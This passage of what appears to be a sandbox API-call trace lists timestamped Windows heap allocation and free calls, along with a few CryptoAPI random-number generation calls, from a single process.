RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0032.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0032.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6c80 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead18 | out: hHeap=0x2b0000) returned 1 [0032.814] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.815] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.815] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.815] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.815] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.815] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0032.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6c80 [0032.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0032.816] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2eac90) returned 1 [0032.817] CryptGenRandom (in: hProv=0x2eac90, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0032.817] CryptReleaseContext (hProv=0x2eac90, dwFlags=0x0) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eac08 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d08 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead18 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae28 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eaf38 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2e80f0 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf38 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8208 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9eb0 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8318 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae28 | out: hHeap=0x2b0000) returned 1 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8208 | out: hHeap=0x2b0000) returned 1 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8318 | out: hHeap=0x2b0000) returned 1 [0032.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0032.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0032.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0032.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0032.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0032.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0032.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0032.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0032.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0032.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0032.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0032.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0032.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2eac08 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2eae28 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eaf30 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2e80f0 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8200 [0032.883] HeapFree (in: hHeap=0x2b0000, 